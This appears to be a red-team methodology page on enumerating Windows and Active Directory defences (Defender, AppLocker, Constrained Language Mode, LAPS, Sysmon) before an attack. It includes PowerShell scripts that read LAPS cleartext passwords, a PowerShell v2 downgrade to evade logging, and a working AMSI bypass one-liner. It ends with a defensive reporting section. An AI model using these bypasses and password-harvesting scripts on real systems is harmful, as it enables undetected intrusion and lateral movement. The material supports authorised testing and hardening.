🛡️ Methodology Checklist
- Identify AV/EDR solution: Get-MpComputerStatus (Defender), process and service list
- Check AppLocker: Get-AppLockerPolicy -Effective
- Check PowerShell Constrained Language Mode: $ExecutionContext.SessionState.LanguageMode
- Check LAPS deployment: Get-LAPSPassword or Get-DomainComputer -Properties ms-mcs-admpwd
- Identify SIEM/logging: Event Log forwarding, Sysmon presence
- Adjust attack approach based on controls: LOTL, obfuscation, AMSI bypass
🎯 Operational Context
Use when: Early in AD engagement — identify what defender products, AV, EDR, and GPO restrictions are deployed before selecting attack tools and evasion techniques.
Think Dumber First: Check sc query windefend and Get-MpComputerStatus before running Mimikatz. Check AppLocker with Get-AppLockerPolicy before attempting PowerShell payloads. 30 seconds of recon saves hours of failed attempts.
Skip when: Scope explicitly excludes evasion — “assumed breach” scenarios may not require EDR bypass.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `Get-MpComputerStatus` | Check Windows Defender status (look for `RealTimeProtectionEnabled`) |
| `Get-AppLockerPolicy -Effective \| select -ExpandProperty RuleCollections` | Enumerate AppLocker rules; check `PathConditions` for bypass gaps |
| `$ExecutionContext.SessionState.LanguageMode` | Check PowerShell Constrained Language Mode (CLM) |
| `Find-LAPSDelegatedGroups` | LAPSToolkit: groups delegated to read LAPS passwords |
| `Find-AdmPwdExtendedRights` | LAPSToolkit: users with "All Extended Rights" (can read LAPS passwords) |
| `Get-LAPSComputers` | LAPSToolkit: extract LAPS cleartext passwords (requires appropriate rights) |
| `powershell.exe -version 2` | Downgrade to the PS v2 engine, which has no Script Block Logging or AMSI; only works if the optional v2 engine and .NET Framework 3.5 are installed |
| `Get-Host` / `$PSVersionTable.PSVersion` | Confirm current PowerShell version (`$PSVersionTable` reports the engine version, `Get-Host` the host version) |
| `netsh advfirewall show allprofiles` | View Windows Firewall state for all profiles |
🔬 Deep Dive & Workflow
Why Enumerate Controls Before Exploiting
Security policies are applied inconsistently across hosts in the same domain: a tool blocked on the DC may run fine on a workstation, and a GPO linked to one OU never reaches another. Map the defensive landscape on each target host before choosing your toolset.
Windows Defender
```
Get-MpComputerStatus
```
Key field: `RealTimeProtectionEnabled : True` means Defender is active and will block standard tools like PowerView by default. Use obfuscated versions, AMSI bypass techniques, or native alternatives.
AppLocker
```
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
```
AppLocker whitelists executables, scripts, DLLs, and installers, each in its own rule collection. Common bypass: admins block `%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe` but forget:
- The 32-bit path: `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe`
- `PowerShell_ISE.exe` (in both the System32 and SysWOW64 paths)
- Alternate script execution paths
Always review `PathConditions` in the output to identify gaps. Note that a collection only bites when its `EnforcementMode` is `Enabled` (not `AuditOnly`) and the Application Identity service (AppIDSvc) is running.
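The following is an added example, not code from the original page: instead of eyeballing `PathConditions`, it dumps every collection's enforcement mode and path rules, then asks the AppLocker policy engine itself (`Test-AppLockerPolicy`) whether a list of candidate interpreters would be allowed for the current user. The candidate paths are assumptions about a typical install; extend the list with whatever you intend to run.

```powershell
# Added example, not code from the original page. Enumerates the effective
# AppLocker policy and asks the policy engine whether the candidate interpreters
# below would be allowed for the current user. Assumptions: AppLocker module
# present (Windows 8 / Server 2012 or later) and the paths below exist on the host.

$candidates = @(
    "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe",   # the one admins usually block
    "$env:SystemRoot\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",   # 32-bit, often forgotten
    "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell_ise.exe",
    "$env:SystemRoot\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe",
    "$env:SystemRoot\System32\cscript.exe",
    "$env:SystemRoot\System32\wscript.exe",
    "$env:SystemRoot\System32\mshta.exe"
)

$policy      = Get-AppLockerPolicy -Effective -ErrorAction Stop
$collections = @($policy.RuleCollections)

if ($collections.Count -eq 0) {
    Write-Host 'No effective AppLocker rules on this host.'
    return
}

# 1. Enforcement mode per collection, then every path rule with its action.
#    Publisher and hash rules have no PathConditions and are skipped here.
foreach ($collection in $collections) {
    '{0,-8} EnforcementMode={1}' -f $collection.RuleCollectionType, $collection.EnforcementMode
    foreach ($rule in $collection) {
        $paths = @($rule.PathConditions | ForEach-Object { $_.Path })
        if ($paths.Count -gt 0) {
            '  [{0,-5}] {1}: {2}' -f $rule.Action, $rule.Name, ($paths -join ', ')
        }
    }
}

# 2. Let the engine decide for each candidate that actually exists on disk.
$user      = "$env:USERDOMAIN\$env:USERNAME"
$present   = @($candidates | Where-Object { Test-Path $_ })
$decisions = Test-AppLockerPolicy -PolicyObject $policy -Path $present -User $user

$decisions | Format-Table FilePath, PolicyDecision, MatchingRule -AutoSize

# Allowed and AllowedByDefault both mean the binary would run under this policy.
$gaps = @($decisions | Where-Object { $_.PolicyDecision -like 'Allowed*' })
'{0} of {1} candidate interpreters allowed for {2}' -f $gaps.Count, $present.Count, $user
```

The decisions describe the policy, not the host's actual behaviour: if the Application Identity service is stopped, or the collection is in `AuditOnly`, even a `Denied` candidate will run. Check the service state alongside this output before drawing conclusions.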
PowerShell Constrained Language Mode (CLM)
```
$ExecutionContext.SessionState.LanguageMode
# FullLanguage = unrestricted
# ConstrainedLanguage = COM objects, arbitrary .NET types, and PS classes blocked
```
CLM blocks most post-exploitation frameworks. Downgrading to the PowerShell v2 engine bypasses CLM, AMSI and Script Block Logging, because none of them exist in that engine:
```
Get-Host # confirm version 5.x
powershell.exe -version 2
Get-Host # should show version 2.0
```
Note: the downgrade itself is logged (event 400 in the Windows PowerShell log shows `EngineVersion=2.0`, and process creation auditing records the command line) even though subsequent script blocks are not. The v2 engine is an optional Windows feature that depends on .NET Framework 3.5; where it has been removed, `-version 2` fails with a .NET Framework error instead of downgrading.
LAPS (Local Administrator Password Solution)
LAPS randomizes the local administrator password per machine so that one dumped local admin password or hash cannot be reused for lateral movement across hosts. LAPSToolkit reveals who can read these passwords:
```
# Who has delegation to read LAPS passwords?
Find-LAPSDelegatedGroups
# Who has "All Extended Rights" (less obvious but equally dangerous)?
Find-AdmPwdExtendedRights
# Read the actual LAPS password (requires rights)
Get-LAPSComputers
```
LAPS Extended Rights trap: accounts that join computers to the domain receive "All Extended Rights" over those computer objects, which includes reading the LAPS password. These are often ordinary user accounts that are far less protected than dedicated admin groups. Hunt for them.
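When LAPSToolkit cannot be dropped on the host, the same two questions (is legacy LAPS deployed, and which computers return their password to me?) can be answered with plain ADSI. This is an added example, not LAPSToolkit code and not from the original page; it assumes the legacy (AdmPwd) schema attributes `ms-Mcs-AdmPwd` and `ms-Mcs-AdmPwdExpirationTime`, a domain-joined host and domain credentials. Windows LAPS uses different attributes (`msLAPS-*`) and is not covered.

```powershell
# Added example, not code from the original page and not LAPSToolkit. Uses plain
# ADSI (no RSAT, no external module) to answer two questions: is legacy LAPS
# deployed, and which computers return their ms-Mcs-AdmPwd to the current user.
# Assumptions: legacy (AdmPwd) schema; domain-joined host; domain credentials.

$rootDse   = [ADSI]'LDAP://RootDSE'
$schemaNC  = $rootDse.schemaNamingContext.Value
$defaultNC = $rootDse.defaultNamingContext.Value

# 1. Schema check: no ms-Mcs-AdmPwd attribute means legacy LAPS was never installed.
$schema = New-Object System.DirectoryServices.DirectorySearcher
$schema.SearchRoot = [ADSI]"LDAP://$schemaNC"
$schema.Filter = '(&(objectClass=attributeSchema)(lDAPDisplayName=ms-Mcs-AdmPwd))'
if ($null -eq $schema.FindOne()) {
    Write-Host 'ms-Mcs-AdmPwd is not in the schema: legacy LAPS is not deployed.'
    return
}

# 2. Managed computers and readable passwords. ms-Mcs-AdmPwdExpirationTime is
#    readable by everyone, so it identifies managed hosts. ms-Mcs-AdmPwd is a
#    confidential attribute: the DC silently omits it for callers without the
#    control-access right, so its presence in a result means we can read it.
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.SearchRoot = [ADSI]"LDAP://$defaultNC"
$searcher.Filter   = '(&(objectCategory=computer)(ms-Mcs-AdmPwdExpirationTime=*))'
$searcher.PageSize = 500
[void]$searcher.PropertiesToLoad.AddRange([string[]]@('name', 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime'))

$results = $searcher.FindAll()
$managed = foreach ($r in $results) {
    $props  = $r.Properties                      # keys come back lower-cased
    $expiry = [DateTime]::FromFileTimeUtc([long]$props['ms-mcs-admpwdexpirationtime'][0])
    $pwd    = $null
    if ($props.Contains('ms-mcs-admpwd')) { $pwd = [string]$props['ms-mcs-admpwd'][0] }
    [pscustomobject]@{
        Computer = [string]$props['name'][0]
        Expires  = $expiry
        Password = $pwd
    }
}
$results.Dispose()

$managed  = @($managed)
$readable = @($managed | Where-Object { $_.Password })
'{0} LAPS-managed computers, {1} with a password readable by {2}\{3}' -f $managed.Count, $readable.Count, $env:USERDOMAIN, $env:USERNAME
$readable | Sort-Object Expires | Format-Table Computer, Expires, Password -AutoSize
```

A zero count in the second number with a non-zero first number is still useful: it tells you LAPS is managing those hosts, so a dumped local admin hash will not travel, and the next step is to find who does hold the read right (the `Find-LAPSDelegatedGroups` / `Find-AdmPwdExtendedRights` question above).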
Control Enumeration Priority
1. Defender → determine if tooling needs obfuscation
2. AppLocker → find execution gaps before dropping binaries
3. CLM → determine if PowerShell-based tools will work
4. LAPS → if present, find who can read it; those passwords = lateral movement
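The priority list above can be run as one pass. The script below is an added example, not code from the original page: it collects Defender state, registered AV and AMSI providers, AppLocker presence and enforcement, PowerShell language mode and logging policies, Sysmon and Windows Event Forwarding indicators, the legacy LAPS client and firewall profile state, using only cmdlets, service queries and registry reads that work as a standard user. Registry paths are the standard policy locations; a missing value is reported as `$null` (not configured), which is an assumption you should read as "no policy set", not "disabled".

```powershell
# Added example, not code from the original page: one-pass triage of a host's
# defensive controls in the priority order above, using only cmdlets, service
# queries and registry reads that work as a standard user. Assumptions: Windows 10
# / Server 2016 or later; the registry paths are the standard policy locations,
# and a missing value is reported as $null ("not configured"), not as disabled.

function Get-RegValue([string]$Path, [string]$Name) {
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}
function Test-ServiceRunning([string]$Name) {
    $svc = Get-Service -Name $Name -ErrorAction SilentlyContinue
    return ($null -ne $svc -and $svc.Status -eq 'Running')
}

$r = [ordered]@{}

# 1. Defender: cmdlet when the module exists, service state otherwise.
$mp = Get-MpComputerStatus -ErrorAction SilentlyContinue
$r.DefenderRealTime   = if ($mp) { $mp.RealTimeProtectionEnabled } else { Test-ServiceRunning 'WinDefend' }
$r.DefenderTamperProt = if ($mp) { $mp.IsTamperProtected } else { $null }
$r.DefenderSigAgeDays = if ($mp) { $mp.AntivirusSignatureAge } else { $null }
# Third-party AV registered with Security Center (client SKUs only; absent on servers).
$r.SecurityCenterAV   = (Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct -ErrorAction SilentlyContinue).displayName -join '; '
# AMSI providers: an entry beyond Defender's usually belongs to an EDR that scans script content.
$r.AmsiProviders      = (Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers' -ErrorAction SilentlyContinue |
    ForEach-Object { (Get-ItemProperty "Registry::HKEY_CLASSES_ROOT\CLSID\$($_.PSChildName)" -ErrorAction SilentlyContinue).'(default)' }) -join '; '

# 2. AppLocker: rules in the registry mean nothing unless AppIDSvc is running.
$r.AppLockerPolicyPresent = Test-Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2'
$r.AppLockerEnforcing     = Test-ServiceRunning 'AppIDSvc'

# 3. PowerShell: language mode, logging policies, and whether a v2 downgrade is even possible.
$r.LanguageMode       = [string]$ExecutionContext.SessionState.LanguageMode
$r.ScriptBlockLogging = Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' 'EnableScriptBlockLogging'
$r.ModuleLogging      = Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging' 'EnableModuleLogging'
$r.Transcription      = Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription' 'EnableTranscripting'
# The v2 engine needs .NET Framework 3.5. Necessary, not sufficient: the optional feature
# MicrosoftWindowsPowerShellV2 must also be enabled, and checking that needs admin rights.
$r.DotNet35Present    = (Get-RegValue 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5' 'Install') -eq 1

# 4. Telemetry: Sysmon under its default service/driver names, and Windows Event Forwarding.
#    A renamed Sysmon install will not show up here; fall back to a driver/altitude review.
$r.SysmonService = @(Get-Service -ErrorAction SilentlyContinue | Where-Object { $_.Name -match '^Sysmon(64)?$' }).Count -gt 0
$r.SysmonDriver  = Test-Path 'HKLM:\SYSTEM\CurrentControlSet\Services\SysmonDrv'
$r.WEFCollector  = Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager' '1'

# 5. LAPS client side: the legacy CSE DLL. Who can read the passwords is an AD question, not a host one.
$r.LegacyLapsCSE = Test-Path "$env:ProgramFiles\LAPS\CSE\AdmPwd.dll"

# 6. Host firewall state per profile.
$r.FirewallProfiles = (Get-NetFirewallProfile -ErrorAction SilentlyContinue |
    ForEach-Object { '{0}={1}' -f $_.Name, $_.Enabled }) -join ', '

[pscustomobject]$r | Format-List
```

Read the output top to bottom in the same order as the priority list: `DefenderRealTime` and a non-empty `AmsiProviders` decide whether tooling needs obfuscation, `AppLockerEnforcing` decides whether to bother dropping binaries, `LanguageMode` plus `ScriptBlockLogging` decides whether PowerShell tooling is viable and observed, and `DotNet35Present` tells you before you try whether a `-version 2` downgrade can work at all.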
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| `Get-MpComputerStatus` returns an error | Defender PowerShell module absent, or Defender disabled by a third-party AV (the cmdlet itself is permitted under CLM) | Use `sc query WinDefend` from cmd.exe, or `Get-Service WinDefend`, to check the service state directly |
| AppLocker GPO not visible | No GPO read rights | Query the locally applied policy: `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 /s` |
| EDR process not recognizable | Custom EDR or branded product | Check running services: `Get-Service \| where {$_.Status -eq 'Running'}` and research unfamiliar names |
| AMSI bypass fails | AMSI patched or updated, the bypass string is signatured, or the session is in CLM (reflection calls are blocked there) | Try an alternative such as `[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0)`; expect to obfuscate the string, since AMSI scans the bypass itself |
| Sysmon events visible in logs | Sysmon deployed | Enumerate the Sysmon config with `sysmon -c` (needs local admin) to understand what is logged; avoid logged event types |
📝 Reporting Trigger
Finding Title: Security Control Enumeration Enables Targeted Evasion
Impact: Identifying deployed AV, EDR, AppLocker, and AMSI configurations allows an attacker to select payloads and techniques that specifically evade the detected security controls, maintaining stealth throughout the engagement.
Root Cause: Security control configurations are visible to authenticated users; no privileged access is required to enumerate most defender settings.
Recommendation: Implement SIEM alerting on security control enumeration activity. Harden AMSI and ensure AV signatures are current. Apply defense in depth; a single EDR solution is insufficient.